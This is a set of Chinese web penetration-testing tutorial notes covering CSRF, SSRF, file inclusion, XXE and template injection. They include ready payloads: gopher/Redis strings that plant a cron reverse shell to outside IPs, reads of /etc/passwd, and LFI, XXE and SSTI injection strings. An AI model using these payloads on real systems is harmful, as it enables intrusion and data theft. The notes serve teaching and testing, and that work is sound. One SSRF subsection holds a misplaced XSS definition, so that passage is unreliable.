├── README.md
├── WEB安全渗透测试基础知识（一）.md
├── WEB安全渗透测试基础知识（七）.md
├── WEB安全渗透测试基础知识（三）.md
├── WEB安全渗透测试基础知识（九）.md
├── WEB安全渗透测试基础知识（二).md
├── WEB安全渗透测试基础知识（五）.md
├── WEB安全渗透测试基础知识（八）.md
├── WEB安全渗透测试基础知识（六）.md
├── WEB安全渗透测试基础知识（十一）.md
├── WEB安全渗透测试基础知识（十七）.md
├── WEB安全渗透测试基础知识（十三）.md
├── WEB安全渗透测试基础知识（十二）.md
├── WEB安全渗透测试基础知识（十五）.md
├── WEB安全渗透测试基础知识（十八）.md
├── WEB安全渗透测试基础知识（十六）.md
├── WEB安全渗透测试基础知识（十四）.md
├── WEB安全渗透测试基础知识（十）.md
├── WEB安全渗透测试基础知识（四）.md
├── burp.png
├── linux CIS .xmind
├── 信息收集.xmind
└── 数据库基线加固.xmind


/README.md:
--------------------------------------------------------------------------------
1 | # CIS
2 | linux基线检查
3 | 包含了Linux上几乎所有的安全检查点
4 | 


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（一）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（一）
  2 | 
  3 | **1.1. Web技术演化**
  4 | 
  5 | 
  6 | 1.1.1. 静态页面
  7 | 在互联网最初开始的时候，Web网站的主要内容是静态的，由文字和图片组成，制作和表现形式也是以表格为主。当时的用户行为也非常简单，仅仅是浏览网页。 
  8 | 
  9 | 
 10 | ------------
 11 | 
 12 | 1.1.2. 多媒体阶段
 13 | 随着技术的不断发展，音频、视频、Flash等多媒体技术诞生了。多媒体的加入使得网页变得更加生动形象，网页上的交互也给用户带来了更好的体验。
 14 | 
 15 | ------------
 16 | 
 17 | 1.1.3. CGI阶段
 18 | 渐渐的，多媒体已经不能满足人们的请求，于是CGI（Common Gateway Interface）应运而生。CGI定义了Web服务器与外部应用程序之间的通信接口标准，因此Web服务器可以通过CGI执行外部程序，让外部程序根据Web请求内容生成动态的内容。 
 19 | 在这个时候，各种编程语言如PHP/ASP/JSP也逐渐加入市场，基于这些语言可以实现更加模块化的、功能更强大的应用程序。
 20 | 
 21 | ------------
 22 | 
 23 | 1.1.4. Ajax 
 24 | 在开始的时候，用户提交整个表单后才能获取结果，用户体验极差。于是Ajax（Asynchronous Javascript And XML）技术逐渐流行起来，它使得应用在不更新整个页面的前提下也可以获得或更新数据。这使得Web应用程序更为迅捷地回应用户动作，并避免了在网络上发送那些没有改变的信息。
 25 | 
 26 | ------------
 27 | 
 28 | 1.1.5. MVC 
 29 | 随着Web应用开发越来越标准化，出现了MVC等思想。MVC是Model/View/Control的缩写，Model用于封装数据和数据处理方法，视图View是数据的HTML展现，控制器Controller负责响应请求，协调Model和View。
 30 | Model，View和Controller的分开，是一种典型的关注点分离的思想，使得代码复用性和组织性更好，Web应用的配置性和灵活性也越来越好。而数据访问也逐渐通过面向对象的方式来替代直接的SQL访问，出现了ORM（Object Relation Mapping）的概念。 
 31 | 除了MVC，类似的设计思想还有MVP，MVVM等。 
 32 | 
 33 | ------------
 34 | 
 35 | 1.1.6. RESTful
 36 | 在CGI时期，前后端通常是没有做严格区分的，随着解耦和的需求不断增加，前后端的概念开始变得清晰。前端主要指网站前台部分，运行在PC端、移动端等浏览器上展现给用户浏览的网页，由HTML5、CSS3、JavaScript组成。后端主要指网站的逻辑部分，涉及数据的增删改查等。
 37 | 此时，REST（Representation State Transformation）逐渐成为一种流行的Web架构风格。 
 38 | REST鼓励基于URL来组织系统功能，充分利用HTTP本身的语义，而不是仅仅将HTTP作为一种远程数据传输协议。一般RESTful有以下的特征： 
 39 | - 域名和主域名分开
 40 | api.example.com
 41 | example.com/api/
 42 | - 带有版本控制
 43 | api.example.com/v1
 44 | api.example.com/v2
 45 | - 使用URL定位资源
 46 | GET /users 获取所有用户
 47 | GET /team/:team/users获取某团队所有用户
 48 | POST /users 创建用户
 49 | PATCH/PUT /users 修改某个用户数据
 50 | DELETE /users 删除某个用户数据
 51 | - 用 HTTP 动词描述操作
 52 | GET 获取资源，单个或多个
 53 | POST 创建资源
 54 | PUT/PATCH 更新资源，客户端提供完整的资源数据 是 DELETE 删除资源
 55 | 正确使用状态码
 56 | 使用状态码提高返回数据的可读性
 57 | - 默认使用 JSON 作为数据响应格式
 58 | - 有清晰的文档 
 59 | 
 60 | ------------
 61 | 
 62 | 1.1.7. 云服务 
 63 | 随着时间的发展，Web的架构越发复杂，负载均衡、数据库分表、异地容灾、缓存、CDN、消息队列等技术开始应用，增加了Web开发和运维的复杂度。同时云服务开始逐渐发展，部署环境容器化，各个功能拆成微服务或是Serverless的架构。
 64 | 
 65 | **1.2. 计算机网络 **
 66 | 
 67 | 1.2.1. 计算机通信网的组成
 68 | 计算机网络由通信子网和资源子网组成。 
 69 | 其中通信子网负责数据的无差错和有序传递，其处理功能包括差错控制、流量控制、路由选择、网络互连等。 
 70 | 其中资源子网：是计算机通信的本地系统环境，包括主机、终端和应用程序等， 资源子网的主要功能是用户资源配置、数据的处理和管理、软件和硬件共享以及负载 均衡等。
 71 |  计算机通信网就是一个由通信子网承载的、传输和共享资源子网的各类信息的系统。
 72 |  
 73 | 
 74 | ------------
 75 | 
 76 | 1.2.2. 通信协议 
 77 | 为了完成计算机之间有序的信息交换，提出了通信协议的概念，其定义是相互通信的双方（或多方）对如何进行信息交换所必须遵守的一整套规则。
 78 |  协议涉及到三个要素，分别为： 
 79 | 语法：语法是用户数据与控制信息的结构与格式，以及数据出现顺序的意义
 80 | 语义：用于解释比特流的每一部分的意义
 81 | 时序：事件实现顺序的详细说明 
 82 | 
 83 | ------------
 84 | 
 85 | 1.2.3. OSI七层模型 
 86 | 1.2.3.1. 简介 
 87 | OSI（Open System Interconnection）共分为物理层、数据链路层、网络层、传输层、会话层、表示层、应用层七层，其具体的功能如下。
 88 | 
 89 | 1.2.3.2. 物理层 
 90 | 提供建立、维护和释放物理链路所需的机械、电气功能和规程等特性
 91 | 通过传输介质进行数据流(比特流)的物理传输、故障监测和物理层管理
 92 | 从数据链路层接收帧，将比特流转换成底层物理介质上的信号
 93 | 
 94 | 1.2.3.3. 数据链路层 
 95 | 在物理链路的两端之间传输数据
 96 | 在网络层实体间提供数据传输功能和控制
 97 | 提供数据的流量控制
 98 | 检测和纠正物理链路产生的差错
 99 | 格式化的消息称为帧 
100 | 
101 | 1.2.3.4. 网络层
102 | 负责端到端的数据的路由或交换，为透明地传输数据建立连接
103 | 寻址并解决与数据在异构网络间传输相关的所有问题
104 | 使用上面的传输层和下面的数据链路层的功能
105 | 格式化的消息称为分组
106 | 
107 | 1.2.3.5. 传输层 
108 | 提供无差错的数据传输
109 | 接收来自会话层的数据，如果需要，将数据分割成更小的分组，向网络层传送分组并确保分组完整和正确到达它们的目的地
110 | 在系统之间提供可靠的透明的数据传输,提供端到端的错误恢复和流量控制
111 | 
112 | 1.2.3.6. 会话层 
113 | 提供节点之间通信过程的协调
114 | 负责执行会话规则（如：连接是否允许半双工或全双工通信）、同步数据流以及当故障发生时重新建立连接
115 | 使用上面的表示层和下面的传输层的功能
116 | 
117 | 1.2.3.7. 表示层 
118 | 提供数据格式、变换和编码转换
119 | 涉及正在传输数据的语法和语义
120 | 将消息以合适电子传输的格式编码
121 | 执行该层的数据压缩和加密
122 | 从应用层接收消息，转换格式，并传送到会话层，该层常合并在应用层中
123 | 
124 | 1.2.3.8. 应用层
125 | 包括各种协议，它们定义了具体的面向拥护的应用：如电子邮件、文件传输等 
126 | 
127 | 1.2.3.9. 总结
128 | 低三层模型属于通信子网，涉及为用户间提供透明连接，操作主要以每条链路（ hop-by-hop）为基础，在节点间的各条数据链路上进行通信。由网络层来控制各条链路上的通信，但要依赖于其他节点的协调操作。 
129 | 高三层属于资源子网，主要涉及保证信息以正确可理解形式传送。
130 | 传输层是高三层和低三层之间的接口，它是第一个端到端的层次，保证透明的端到端连接，满足用户的服务质量（ QoS）要求，并向高三层提供合适的信息形式。 
131 | 
132 | 
133 | 


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（七）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（七）
  2 | 
  3 | **3.3. CSRF漏洞**
  4 | 
  5 | 3.3.1. 简介
  6 | CSRF（Cross-site request forgery）跨站请求伪造，也被称为“One Click Attack”或者Session Riding，通常缩写为CSRF，是一种对网站的恶意利用。尽管听起来像跨站脚本（XSS），但它与XSS非常不同，XSS利用站点内的信任用户，而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。
  7 | 
  8 | ------------
  9 | 
 10 | 3.3.2. 分类
 11 | 3.3.2.1. 资源包含
 12 | 资源包含是在大多数介绍CSRF概念的演示或基础课程中可能看到的类型。这种类型归结为控制HTML标签```
 13 | （例如<image>、<audio>、<video>、<object>、<script>等）
 14 | ```所包含的资源的攻击者。如果攻击者能够影响URL被加载的话，包含远程资源的任何标签都可以完成攻击。  
 15 | 由于缺少对Cookie的源点检查，如上所述，此攻击不需要XSS，可以由任何攻击者控制的站点或站点本身执行。此类型仅限于GET请求，因为这些是浏览器对资源URL唯一的请求类型。这种类型的主要限制是它需要错误地使用安全的HTTP请求方式。
 16 | 
 17 | 3.3.2.2. 基于表单
 18 | 通常在正确使用安全的请求方式时看到。攻击者创建一个想要受害者提交的表单; 其包含一个JavaScript片段，强制受害者的浏览器提交。  
 19 | 该表单可以完全由隐藏的元素组成，以致受害者很难发现它。 
 20 | 如果处理cookies不当，攻击者可以在任何站点上发动攻击，只要受害者使用有效的cookie登录，攻击就会成功。如果请求是有目的性的，成功的攻击将使受害者回到他们平时正常的页面。该方法对于攻击者可以将受害者指向特定页面的网络钓鱼攻击特别有效。
 21 | 
 22 | 3.3.2.3. XMLHttpRequest
 23 | 这可能是最少看到的方式。  
 24 | 由于许多现代Web应用程序依赖XHR，许多应用花费大量的时间来构建和实现这一特定的对策。  
 25 | 基于XHR的CSRF通常由于SOP而以XSS有效载荷的形式出现。没有跨域资源共享策略（CORS），XHR仅限于攻击者托管自己的有效载荷的原始请求。  
 26 | 这种类型的CSRF的攻击有效载荷基本上是一个标准的XHR，攻击者已经找到了一些注入受害者浏览器DOM的方式。
 27 | 
 28 | ------------
 29 | 
 30 | 3.3.3. 防御
 31 | 通过CSRF-token或者验证码来检测用户提交
 32 | 验证Referer/Content-Type
 33 | 对于用户修改删除等操作最好都使用POST操作
 34 | 避免全站通用的cookie，严格设置cookie的域
 35 | 
 36 | ------------
 37 | 
 38 | **3.4. SSRF漏洞**
 39 | 
 40 | 3.4.1. 简介
 41 | 服务端请求伪造（Server Side Request Forgery, SSRF）指的是攻击者在未能取得服务器所有权限时，利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。
 42 | 
 43 | ------------
 44 | 
 45 | 3.4.2. 漏洞危害
 46 | SSRF可以对外网、服务器所在内网、本地进行端口扫描，攻击运行在内网或本地的应用，或者利用File协议读取本地文件。  
 47 | 内网服务防御相对外网服务来说一般会较弱，甚至部分内网服务为了运维方便并没有对内网的访问设置权限验证，所以存在SSRF时，通常会造成较大的危害。
 48 | 
 49 | 
 50 | ------------
 51 | 
 52 | 3.4.3. 利用方式
 53 | SSRF利用存在多种形式以及不同的场景，针对不同场景可以使用不同的绕过方式。  
 54 | 以curl为例, 可以使用dict protocol操作Redis、file协议读文件、gopher协议反弹Shell等功能，常见的Payload如下：  
 55 | curl -vvv 'dict://127.0.0.1:6379/info'  
 56 | curl -vvv 'file:///etc/passwd'  
 57 |     # * 注意: 链接使用单引号，避免$变量问题
 58 |     
 59 | curl -vvv 'gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a'
 60 | 
 61 | 
 62 | ------------
 63 | 
 64 | 3.4.4. 相关危险函数
 65 | SSRF涉及到的危险函数主要是网络访问，支持伪协议的网络读取。以PHP为例，涉及到的函数有 file_get_contents() / fsockopen() / curl_exec() 等。
 66 | 
 67 | 3.4.5. 过滤绕过
 68 | 
 69 | 3.4.5.1. 更改IP地址写法
 70 | 一些开发者会通过对传过来的URL参数进行正则匹配的方式来过滤掉内网IP，如采用如下正则表达式：  
 71 | ^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$ 
 72 | ^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$
 73 | ^192\.168(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$
 74 | 
 75 | 对于这种过滤我们采用改编IP的写法的方式进行绕过，例如192.168.0.1这个IP地址可以被改写成：
 76 | 8进制格式：0300.0250.0.1
 77 | 16进制格式：0xC0.0xA8.0.1
 78 | 10进制整数格式：3232235521
 79 | 16进制整数格式：0xC0A80001
 80 | 
 81 | 还有一种特殊的省略模式，例如10.0.0.1这个IP可以写成10.1。  访问改写后的IP地址时，Apache会报400 Bad Request，但Nginx、MySQL等其他服务仍能正常工作。  另外，0.0.0.0这个IP可以直接访问到本地，也通常被正则过滤遗漏。
 82 | 
 83 | 3.4.5.2. 使用解析到内网的域名
 84 | XSS全称为Cross Site Scripting，为了和CSS分开简写为XSS，中文名为跨站脚本。该漏洞发生在用户端，是指在渲染过程中发生了不在预期过程中的JavaScript代码执行。XSS通常被用于获取Cookie、以受攻击者的身份进行操作等行为。
 85 | 
 86 | 3.4.5.3. 利用解析URL所出现的问题
 87 | 在某些情况下，后端程序可能会对访问的URL进行解析，对解析出来的host地址进行过滤。这时候可能会出现对URL参数解析不当，导致可以绕过过滤。  
 88 | 比如 http://www.baidu.com@192.168.0.1/ 当后端程序通过不正确的正则表达式（比如将http之后到com为止的字符内容，也就是www.baidu.com，认为是访问请求的host地址时）对上述URL的内容进行解析的时候，很有可能会认为访问URL的host为www.baidu.com，而实际上这个URL所请求的内容都是192.168.0.1上的内容。
 89 | 
 90 | 3.4.5.4. 利用跳转
 91 | 如果后端服务器在接收到参数后，正确的解析了URL的host，并且进行了过滤，我们这个时候可以使用跳转的方式来进行绕过。  
 92 | 可以使用如 http://httpbin.org/redirect-to?url=http://192.168.0.1 等服务跳转，但是由于URL中包含了192.168.0.1这种内网IP地址，可能会被正则表达式过滤掉，可以通过短地址的方式来绕过。  
 93 | 常用的跳转有302跳转和307跳转，区别在于307跳转会转发POST请求中的数据等，但是302跳转不会。
 94 | 
 95 | .4.5.5. 通过各种非HTTP协议
 96 | 如果服务器端程序对访问URL所采用的协议进行验证的话，可以通过非HTTP协议来进行利用。  
 97 | 比如通过gopher，可以在一个url参数中构造POST或者GET请求，从而达到攻击内网应用的目的。例如可以使用gopher协议对与内网的Redis服务进行攻击，可以使用如下的URL：
 98 | 
 99 | gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
100 | 
101 | 除了gopher协议，File协议也是SSRF中常用的协议，该协议主要用于访问本地计算机中的文件，我们可以通过类似 file:///path/to/file 这种格式来访问计算机本地文件。使用file协议可以避免服务端程序对于所访问的IP进行的过滤。例如我们可以通过 file:///d:/1.txt 来访问D盘中1.txt的内容。
102 | 
103 | 3.4.5.6. DNS Rebinding
104 | 一个常用的防护思路是：对于用户请求的URL参数，首先服务器端会对其进行DNS解析，然后对于DNS服务器返回的IP地址进行判断，如果在黑名单中，就禁止该次请求。  
105 | 但是在整个过程中，第一次去请求DNS服务进行域名解析到第二次服务端去请求URL之间存在一个时间差，利用这个时间差，可以进行DNS重绑定攻击。  
106 | 要完成DNS重绑定攻击，我们需要一个域名，并且将这个域名的解析指定到我们自己的DNS Server，在我们的可控的DNS Server上编写解析服务，设置TTL时间为0。这样就可以进行攻击了，完整的攻击流程为：
107 | 服务器端获得URL参数，进行第一次DNS解析，获得了一个非内网的IP
108 | 对于获得的IP进行判断，发现为非黑名单IP，则通过验证
109 | 服务器端对于URL进行访问，由于DNS服务器设置的TTL为0，所以再次进行DNS解析，这一次DNS服务器返回的是内网地址。
110 | 由于已经绕过验证，所以服务器端返回访问内网资源的结果。
111 | 
112 | 
113 | 3.4.5.7. 利用IPv6
114 | 有些服务没有考虑IPv6的情况，但是内网又支持IPv6，则可以使用IPv6的本地IP如 [::] 0000::1或IPv6的内网域名来绕过过滤。
115 | 3.4.5.8. 利用IDN
116 | 一些网络访问工具如Curl等是支持国际化域名（Internationalized Domain Name，IDN）的，国际化域名又称特殊字符域名，是指部分或完全使用特殊的文字或字母组成的互联网域名。  
117 | 在这些字符中，部分字符会在访问时做一个等价转换，例如 ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ 和 example.com 等同。利用这种方式，可以用 ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ 等字符绕过内网限制。
118 | 
119 | 
120 | ------------
121 | 
122 | 3.4.6. 可能的利用点
123 | ftp、ftps （FTP爆破）
124 | sftp
125 | tftp（UDP协议扩展）
126 | dict
127 | gopher
128 | ldap
129 | imap/imaps/pop3/pop3s/smtp/smtps（爆破邮件用户名密码）
130 | rtsp – smb/smbs（连接SMB）
131 | telnet
132 | http、https
133 | mongodb
134 | ShellShock命令执行
135 | JBOSS远程Invoker war命令执行
136 | Java调试接口命令执行
137 | axis2-admin部署Server命令执行
138 | Jenkins Scripts接口命令执行
139 | Confluence SSRF
140 | Struts2 命令执行
141 | counchdb WEB API远程命令执行
142 | docker API远程命令执行
143 | php_fpm/fastcgi 命令执行
144 | tomcat命令执行
145 | Elasticsearch引擎Groovy脚本命令执行
146 | WebDav PUT上传任意文件
147 | WebSphere Admin可部署war间接命令执行
148 | Apache Hadoop远程命令执行
149 | zentoPMS远程命令执行
150 | HFS远程命令执行
151 | glassfish任意文件读取和war文件部署间接命令执行
152 | 
153 | ------------
154 | 
155 | 3.4.7. 防御方式
156 | 过滤返回的信息
157 | 统一错误信息
158 | 限制请求的端口
159 | 禁止不常用的协议
160 | 对DNS Rebinding，考虑使用DNS缓存或者Host白名单


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（三）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（三）
  2 | 
  3 | **1.5. 代码审计**
  4 | 
  5 | 
  6 | 1.5.1. 简介
  7 | 代码审计是找到应用缺陷的过程。其通常有白盒、黑盒、灰盒等方式。白盒指通过对源代码的分析找到应用缺陷，黑盒通常不涉及到源代码，多使用模糊测试的方式，而灰盒则是黑白结合的方式。
  8 | 
  9 | 
 10 | 
 11 | ------------
 12 | 
 13 | 1.5.2. 常用概念
 14 | 1.5.2.1. 输入
 15 | 应用的输入，可以是请求的参数（GET、POST等）、上传的文件、网络、数据库等用户可控或者间接可控的地方。
 16 | 1.5.2.2. 处理函数
 17 | 处理数据的函数，可能是过滤，也可能是编解码。
 18 | 1.5.2.3. 危险函数
 19 | 又常叫做Sink Call、漏洞点，是可能触发危险行为如文件操作、命令执行、数据库操作等行为的函数。
 20 | 
 21 | ------------
 22 | 
 23 | 1.5.3. 自动化审计
 24 | 一般认为一个漏洞的触发过程是从输入经过过滤到危险函数的过程，而审计就是寻找这个链条的过程。
 25 | 
 26 | 1.5.3.1. 危险函数匹配
 27 | 白盒审计最常见的方式是通过搜寻危险函数与危险参数定位漏洞，比较有代表性的工具是Seay开发的审计工具。这种方法误报率相当高，这是因为这种方法没有对程序的流程进行深入分析，另一方面，这种方式通常是孤立地分析每一个文件，忽略了文件之间复杂的调用关系。  
 28 | 具体的说，这种方式在一些环境下能做到几乎无漏报，只要审计者有耐心，可以发现大部分的漏洞，但是在高度框架化的代码中，能找到的漏洞相对有限。
 29 | 
 30 | 1.5.3.2. 控制流分析
 31 | 在后来的系统中，考虑到一定程度引入AST作为分析的依据，在一定程度上减少了误报，但是仍存在很多缺陷。 
 32 | 而后，Dahse J等人设计了RIPS，该工具进行数据流与控制流分析，结合过程内与过程间的分析得到审计结果，相对危险函数匹配的方式来说误报率少了很多，但是同样的也增加了开销。
 33 | 
 34 | 1.5.3.3. 灰盒分析
 35 | 国内安全研究员fate0提出了基于运行时的分析方式，解决了控制流分析实现复杂、计算路径开销大的问题。
 36 | 
 37 | 
 38 | ------------
 39 | 
 40 | 1.5.4. 手工审计方式
 41 | - 拿到代码，确定版本，确定能否正常运行
 42 | 找历史漏洞
 43 | 找应用该系统的实例
 44 | 
 45 | - 简单审计，运行审计工具看是否有漏洞
 46 | 
 47 | - 大概看懂整个程序是如何运行的
 48 | 文件如何加载
 49 | 类库依赖
 50 | 有没有加载waf
 51 | 
 52 | - 数据库如何连接
 53 | mysql/mysqli/pdo
 54 | 有没有用预编译
 55 | 
 56 | - 视图如何形成 
 57 | 能不能xss
 58 | 能不能模版注入
 59 | 
 60 | - SESSION如何处理
 61 | 文件
 62 | 数据库
 63 | 内存
 64 | 
 65 | - Cache如何处理
 66 | 文件cache可能写shell
 67 | 数据库cache可能注入
 68 | memcache
 69 | 
 70 | - 看账户体系
 71 | 
 72 | - 管理员账户的密码
 73 | 加密方式
 74 | 泄漏数据后能不能爆破密码
 75 | 重置漏洞
 76 | 
 77 | - 修改密码漏洞
 78 | 修改其他人密码
 79 | 
 80 | - 普通用户的帐号
 81 | 能否拿到普通用户权限
 82 | 普通用户帐号能否盗号
 83 | 重点找没有帐号的情况下可以访问的页面
 84 | 是不是OAuth
 85 | 
 86 | - 攻击
 87 | SQLi
 88 | 看全局过滤能否bypass
 89 | 看是否有直接执行sql的地方
 90 | 
 91 | - 看是用的什么驱动，mysql/mysqli/pdo
 92 | 如果使用PDO，看是否是直接执行的地方
 93 | 
 94 | - XSS
 95 | 全局bypass
 96 | 直接echo
 97 | 看视图是怎么加载的
 98 | 
 99 | - FILE
100 | 上传下载覆盖删除
101 | 
102 | - 包含
103 | LFI
104 | RFI
105 | 全局找include, require
106 | 
107 | - 正常上传
108 | 看上传是如何确定能否上传文件的
109 | 
110 | - RCE
111 | call_user_func
112 | eval
113 | assert
114 | preg_replace /e
115 | XXE
116 | CSRF
117 | SSRF
118 | 反序列化
119 | 
120 | - 变量覆盖
121 | extract
122 | parse_str
123 | array_map
124 | LDAP
125 | XPath
126 | Cookie伪造
127 | 
128 | - 过滤
129 | 
130 | - 找WAF
131 | 看waf怎么过滤的，相应的如何绕过


--------------------------------------------------------------------------------
/WEB安全渗透测试基础知识（九）.md:
--------------------------------------------------------------------------------
  1 | # WEB安全渗透测试基础知识（九）
  2 | 
  3 | **3.8. 文件包含**
  4 | 
  5 | 3.8. 文件包含
  6 | 
  7 | 3.8.1. 基础
  8 | 
  9 | 常见的文件包含漏洞的形式为 <?php include("inc/" . $_GET['file']); ?>  
 10 | 考虑常用的几种包含方式为  
 11 | 同目录包含 file=.htaccess
 12 | 目录遍历 ?file=../../../../../../../../../var/lib/locate.db
 13 | 日志注入 ?file=../../../../../../../../../var/log/apache/error.log
 14 | 利用 /proc/self/environ
 15 | 其中日志可以使用SSH日志或者Web日志等多种日志来源测试
 16 | ------------
 17 | 
 18 | 3.8.2. 绕过技巧
 19 | 
 20 | 常见的应用在文件包含之前，可能会调用函数对其进行判断，一般有如下几种绕过方式
 21 | 
 22 | 3.8.2.1. url编码绕过
 23 | 
 24 | 如果WAF中是字符串匹配，可以使用url多次编码的方式可以绕过
 25 | 
 26 | 3.8.2.2. 特殊字符绕过
 27 | 
 28 | 某些情况下，读文件支持使用Shell通配符，如 ? * 等
 29 | url中 使用 ? # 可能会影响include包含的结果
 30 | 某些情况下，unicode编码不同但是字形相近的字符有同一个效果
 31 | 
 32 | 3.8.2.3. %00截断
 33 | 
 34 | 几乎是最常用的方法，条件是magic_quotes_gpc打开，而且php版本小于5.3.4。
 35 | 
 36 | 3.8.2.4. 长度截断
 37 | Windows上的文件名长度和文件路径有关。具体关系为：从根目录计算，文件路径长度最长为259个bytes。
 38 | 
 39 | msdn定义“`#define MAX_PATH 260“`，第260个字符为字符串结尾的“`0“`  
 40 | 
 41 | linux可以用getconf来判断文件名长度限制和文件路径长度限制  
 42 | 
 43 | 获取最长文件路径长度：getconf PATH_MAX /root 得到4096 获取最长文件名：getconf NAME_MAX /root 得到255  
 44 | 
 45 | 那么在长度有限的时候，`././././` (n个) 的形式就可以通过这个把路径爆掉  
 46 | 
 47 | 在php代码包含中，这种绕过方式要求php版本 < php 5.2.8
 48 | 
 49 | 3.8.2.5. 伪协议绕过
 50 | 
 51 | - 远程包含: 要求 allow_url_fopen=On and allow_url_include=On ， payload为 ?file=[http|https|ftp]://websec.wordpress.com/shell.txt
 52 | - PHP INPUT: 把payload放在POST参数中作为包含的文件，要求 allow_url_include=On ，payload为 ?file=php://input
 53 | - BASE64: 使用Base64伪协议读取文件，payload为 ?file=php://filter/convert.base64-encode/resource=index.php
 54 | - DATA: 使用data伪协议读取文件，payload为 ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo= 要求 allow_url_include=On
 55 | 
 56 | 
 57 | ---
 58 | 
 59 | **3.9. XXE**
 60 | 
 61 | 3.9.1. XML基础
 62 | 
 63 | XML 指可扩展标记语言（eXtensible Markup Language），是一种用于标记电子文件使其具有结构性的标记语言，被设计用来传输和存储数据。XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素。目前，XML文件作为配置文件（Spring、Struts2等）、文档结构说明文件（PDF、RSS等）、图片格式文件（SVG header）应用比较广泛。
 64 | 
 65 | ---
 66 | 
 67 | 3.9.2. XXE
 68 | 
 69 | 当允许引用外部实体时，可通过构造恶意的XML内容，导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等后果。一般的XXE攻击，只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件，但是也可以通过Blind XXE的方式实现攻击。
 70 | 
 71 | 
 72 | ---
 73 | 3.9.3. 攻击方式
 74 | 
 75 | 3.9.3.1. 拒绝服务攻击
 76 | 
 77 | <!DOCTYPE data [ 
 78 | <!ELEMENT data (#ANY)> 
 79 | <!ENTITY a0 "dos" > 
 80 | <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;"> 
 81 | <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;"> 
 82 | ]> 
 83 | <data>&a2;</data>
 84 | 
 85 | 
 86 | 若解析过程非常缓慢，则表示测试成功，目标站点可能有拒绝服务漏洞。具体攻击可使用更多层的迭代或递归，也可引用巨大的外部实体，以实现攻击的效果。
 87 | 
 88 | 
 89 | 3.9.3.2. 文件读取
 90 | 
 91 | <?xml version="1.0"?> 
 92 | 
 93 | <!ELEMENT data (#ANY)> 
 94 | <!ENTITY file SYSTEM "file:///etc/passwd"> 
 95 | ]> 
 96 | <data>&file;</data>
 97 | 3.9.3.3. SSRF
 98 | <?xml version="1.0"?> 
 99 | <!DOCTYPE data SYSTEM "http://publicServer.com/" [ 
100 | <!ELEMENT data (#ANY)> 
101 | ]> 
102 | <data>4</data>
103 | 3.9.3.4. RCE
104 | <?xml version="1.0"?> 
105 | <!DOCTYPE GVI [ <!ELEMENT foo ANY > 
106 | <!ENTITY xxe SYSTEM "expect://id" >]> 
107 | <catalog>    
108 |        <core id="test101">       
109 |          <description>&xxe;</description>    
110 |      </core> 
111 | </catalog>
112 | 
113 | 
114 | 3.9.3.5. XInclude
115 | 
116 | <?xml version='1.0'?> 
117 | <data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://publicServer.com/file.xml"></xi:incl
118 | 
119 | 
120 | 
121 | ---
122 | 
123 | **3.10 模板注入漏洞**
124 | 
125 | 3.10. 模版注入
126 | 
127 | 3.10.1. 简介
128 | 
129 | 模板引擎用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化，以生成网页、电子邮件等。模板引擎通过使用代码构造（如条件语句、循环等）处理上下文数据，允许在模板中使用强大的语言表达式，以呈现动态内容。如果攻击者能够控制要呈现的模板，则他们将能够注入可暴露上下文数据，甚至在服务器上运行任意命令的表达式。
130 | 
131 | ---
132 | 3.10.2. 测试方法
133 | 
134 | - 确定使用的引擎
135 | - 查看引擎相关的文档，确定其安全机制以及自带的函数和变量
136 | - 需找攻击面，尝试攻击
137 | 
138 | 
139 | ---
140 | 3.10.3. 测试用例
141 | 
142 | - 简单的数学表达式，{{ 7+7 }} => 14
143 | - 字符串表达式 {{ "ajin" }} => ajin
144 | - Ruby
145 | 
146 | <%= 7 * 7 %>
147 | 
148 | <%= File.open('/etc/passwd').read %>
149 | 
150 | - Java
151 | 
152 | ${7*7}
153 | 
154 | - Twig
155 | 
156 | {{7*7}}
157 | 
158 | 
159 | - Smarty
160 | 
161 | {php}echo `id`;{/php}
162 | 
163 | - AngularJS
164 | 
165 | $eval('1+1')
